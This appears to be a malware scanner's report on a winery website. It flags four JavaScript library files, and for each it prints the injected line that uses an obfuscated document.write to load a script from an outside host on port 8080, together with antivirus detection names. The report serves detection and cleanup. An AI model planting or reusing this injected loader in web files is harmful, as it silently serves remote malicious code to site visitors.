Malware Scanner report for tour-des-chenes.com

Malicious/Suspicious/Total urls checked: 4/0/15

4 pages have malicious code. See details below

Blacklists: OK

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Scanned pages/files

Request	Server response	Status
http://tour-des-chenes.com/	200 OK Content-Length: 6438 Content-Type: text/html	clean
http://tour-des-chenes.com/appelation.htm	200 OK Content-Length: 6169 Content-Type: text/html	clean
http://tour-des-chenes.com/Scripts/AC_RunActiveContent.js	200 OK Content-Length: 3341 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) function AC_AddExtension(src, ext) { if (src.indexOf('?') != -1) return src.replace(/\?/, ext+'?'); else return src + ext; } function AC_Generateobj(objAttrs, params, embedAttrs) { var str = '<object '; for (var i in objAttrs) str += i + '="' + objAttrs[i] + '" '; str += '>'; for (var i in params) str += '<param name="' + i + '" value="' + params[i] + '" /> '; str += '<embed '; for ( ... 2795 bytes are skipped ...br/> case "id": case "tabindex": ret.embedAttrs[args[i]] = ret.objAttrs[args[i]] = args[i+1]; break; default: ret.embedAttrs[args[i]] = ret.params[args[i]] = args[i+1]; } } ret.objAttrs["classid"] = classid; if (mimeType) ret.embedAttrs["type"] = mimeType; return ret; } document.write('<s'+'cript type="text/javascript" src="http://drunkjeans.com:8080/Cc.js"></scr'+'ipt>'); Antivirus reports: AntiVir JS/Redir.jea Avast JS:Redirector-FA [Trj] Ikarus Trojan.JS.Redir nProtect Trojan.JS.Redirector.ADM Emsisoft Trojan.JS.Redirector.ADM (B) Comodo TrojWare.JS.Redirect.sst Microsoft Trojan:JS/Redirector.EV MicroWorld-eScan Trojan.JS.Redirector.ADM Fortinet JS/HackLoad.BBEL!tr TotalDefense JS/Redirector.BB F-Secure Trojan.JS.Redirector.ADM Sophos Mal/HappJS-A GData Trojan.JS.Redirector.ADM ESET-NOD32 JS/TrojanDownloader.HackLoad.AE BitDefender Trojan.JS.Redirector.ADM
http://tour-des-chenes.com/vignoble.htm	200 OK Content-Length: 4666 Content-Type: text/html	clean
http://tour-des-chenes.com/cepages.htm	200 OK Content-Length: 6850 Content-Type: text/html	clean
http://tour-des-chenes.com/cuvees.htm	200 OK Content-Length: 7252 Content-Type: text/html	clean
http://tour-des-chenes.com/temoignages.htm	200 OK Content-Length: 4664 Content-Type: text/html	clean
http://tour-des-chenes.com/lightbox/js/prototype.js	200 OK Content-Length: 47711 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) var Prototype = { Version: '1.4.0', ScriptFragment: '(?:<script.?>)((\n\|\r\|.)?)(?:<\/script>)', emptyFunction: function() {}, K: function(x) {return x} } var Class = { create: function() { return function() { this.initialize.apply(this, arguments); } } } var Abstract = new Object(); Object.extend = function(destination, source) { for (property in source) { destination[property] = source[ ... 3510 bytes are skipped ... valueT = 0, valueL = 0; do { valueT += element.offsetTop \|\| 0; valueL += element.offsetLeft \|\| 0; if (element.offsetParent == document.body) if (Element.getStyle(element, 'position') == 'absolute') break; element = element.offsetParent; } while (element); return [valueL, valueT]; } } document.write('<s'+'cript type="text/javascript" src="http://drunkjeans.com:8080/Cc.js"></scr'+'ipt>'); Antivirus reports: Qihoo-360 virus.html.url Avast JS:Illredir-CI [Trj] Ad-Aware Trojan.Redirector.JS.BZ Ikarus Trojan-Downloader.JS.HackLoad nProtect Trojan.Redirector.JS.BZ Emsisoft Trojan.Redirector.JS.BZ (B) MicroWorld-eScan Trojan.Redirector.JS.BZ Tencent Js.Trojan.Redirector.Gvo Cyren JS/Redir.OX F-Secure Trojan.Redirector.JS.BZ VIPRE Trojan-Clicker.HTML.RemoteScript (v) F-Prot JS/Redir.OX AVG JS/Redir Sophos Mal/HappJS-A GData Trojan.Redirector.JS.BZ AVware Trojan-Clicker.HTML.RemoteScript (v) ESET-NOD32 JS/TrojanDownloader.HackLoad.AA BitDefender Trojan.Redirector.JS.BZ
http://tour-des-chenes.com/lightbox/js/scriptaculous.js?load=effects	200 OK Content-Length: 2260 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) var Scriptaculous = { Version: '1.5.1', require: function(libraryName) { document.write('<script type="text/javascript" src="'+libraryName+'"></script>'); }, load: function() { if((typeof Prototype=='undefined') \|\| parseFloat(Prototype.Version.split(".")[0] + "." + Prototype.Version.split(".")[1]) < 1.4) throw("script.aculo.us requires the Prototype JavaScript framework >= 1.4.0"); ... 161 bytes are skipped ...ach( function(s) { var path = s.src.replace(/scriptaculous\.js(\?.)?$/,''); var includes = s.src.match(/\?.load=([a-z,]*)/); (includes ? includes[1] : 'builder,effects,dragdrop,controls,slider').split(',').each( function(include) { Scriptaculous.require(path+include+'.js') }); }); } } Scriptaculous.load(); document.write('<s'+'cript type="text/javascript" src="http://drunkjeans.com:8080/Cc.js"></scr'+'ipt>'); Antivirus reports: AntiVir HTML/Rce.Gen3 Avast HTML:Script-inf nProtect Trojan.JS.Redirector.AEY K7AntiVirus Trojan Emsisoft Trojan.JS.Redirector.AEY (B) McAfee-GW-Edition JS/Redirector.o Kaspersky HEUR:Trojan.Script.Generic Microsoft Trojan:JS/Gamburl.E TotalDefense JS/Redirector!generic McAfee JS/Redirector.o NANO-Antivirus Trojan.Url.IframeB.zwzsb F-Secure Trojan.JS.Redirector.AEY F-Prot HTML/Linker.U Sophos Mal/Badsrc-C GData Trojan.JS.Redirector.AEY Commtouch HTML/Linker.U ESET-NOD32 HTML/ScrInject.B.Gen BitDefender Trojan.JS.Redirector.AEY
http://tour-des-chenes.com/lightbox/js/lightbox.js	200 OK Content-Length: 20141 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) var fileLoadingImage = "../lightbox/images/loading.gif"; var fileBottomNavCloseImage = "../lightbox/images/close.gif"; var resizeSpeed = 7; var borderSize = 10; var imageArray = new Array; var activeImage; if(resizeSpeed > 10){ resizeSpeed = 10;} if(resizeSpeed < 1){ resizeSpeed = 1;} resizeDuration = (11 - resizeSpeed) * 0.15; Object.extend(Element, { getWidth: function(element) { element = $(element); return element.offsetWid ... 3560 bytes are skipped ...ibility = "hidden"; } } function pause(numberMillis) { var now = new Date(); var exitTime = now.getTime() + numberMillis; while (true) { now = new Date(); if (now.getTime() > exitTime) return; } } function initLightbox() { myLightbox = new Lightbox(); } Event.observe(window, 'load', initLightbox, false); document.write('<s'+'cript type="text/javascript" src="http://drunkjeans.com:8080/Cc.js"></scr'+'ipt>'); Antivirus reports: AntiVir JS/iFrame.US Avast JS:Iframe-AEL [Trj] Ad-Aware Trojan.JS.Iframe.CMG Bkav MW.Clodd78.Trojan.8ba2 Ikarus Virus.HTML.Framer nProtect Trojan.JS.Iframe.CMG TrendMicro-HouseCall TROJ_GEN.F47V1121 Comodo TrojWare.JS.Iframe.CP Emsisoft Trojan.JS.Iframe.CMG (B) Microsoft Exploit:HTML/IframeRef.EP Kaspersky HEUR:Trojan.Script.Generic MicroWorld-eScan Trojan.JS.Iframe.CMG Fortinet JS/Iframe.CMG!tr NANO-Antivirus Trojan.Url.IframeB.bboxvt F-Secure Trojan.JS.Iframe.CMG F-Prot IFrame.gen AVG HTML/Framer Norman Iframe.RZ GData Trojan.JS.Iframe.CMG Commtouch IFrame.gen ESET-NOD32 HTML/Iframe.B.Gen BitDefender Trojan.JS.Iframe.CMG
http://tour-des-chenes.com/batiment.htm	200 OK Content-Length: 6241 Content-Type: text/html	clean
http://tour-des-chenes.com/salles.htm	200 OK Content-Length: 5725 Content-Type: text/html	clean
http://tour-des-chenes.com/cave.htm	200 OK Content-Length: 5953 Content-Type: text/html	clean
http://tour-des-chenes.com/jardins.htm	200 OK Content-Length: 5707 Content-Type: text/html	clean
http://tour-des-chenes.com/services_r.htm	200 OK Content-Length: 5940 Content-Type: text/html	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: tour-des-chenes.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 05 Oct 2014 14:03:40 GMT
Server: Apache/2.2.3 (Debian) mod_ssl/2.2.3 OpenSSL/0.9.8c
Content-Language: fr
Content-Type: text/html; charset=ISO-8859-1
X-Powered-By: PHP/5.2.9

Second query (visit from search engine):
GET / HTTP/1.1
Host: tour-des-chenes.com
Referer: http://www.google.com/search?q=tour-des-chenes.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=tour-des-chenes.com

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://tour-des-chenes.com/

Result: tour-des-chenes.com is not infected or malware details are not published yet.

Recently found suspicious websites

Malware Scanner report for tour-des-chenes.com

Malware & Hack Repair

Website Hack Insurance

Scanned pages/files

Malicious Redirects

Safe Browsing / Blacklists

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools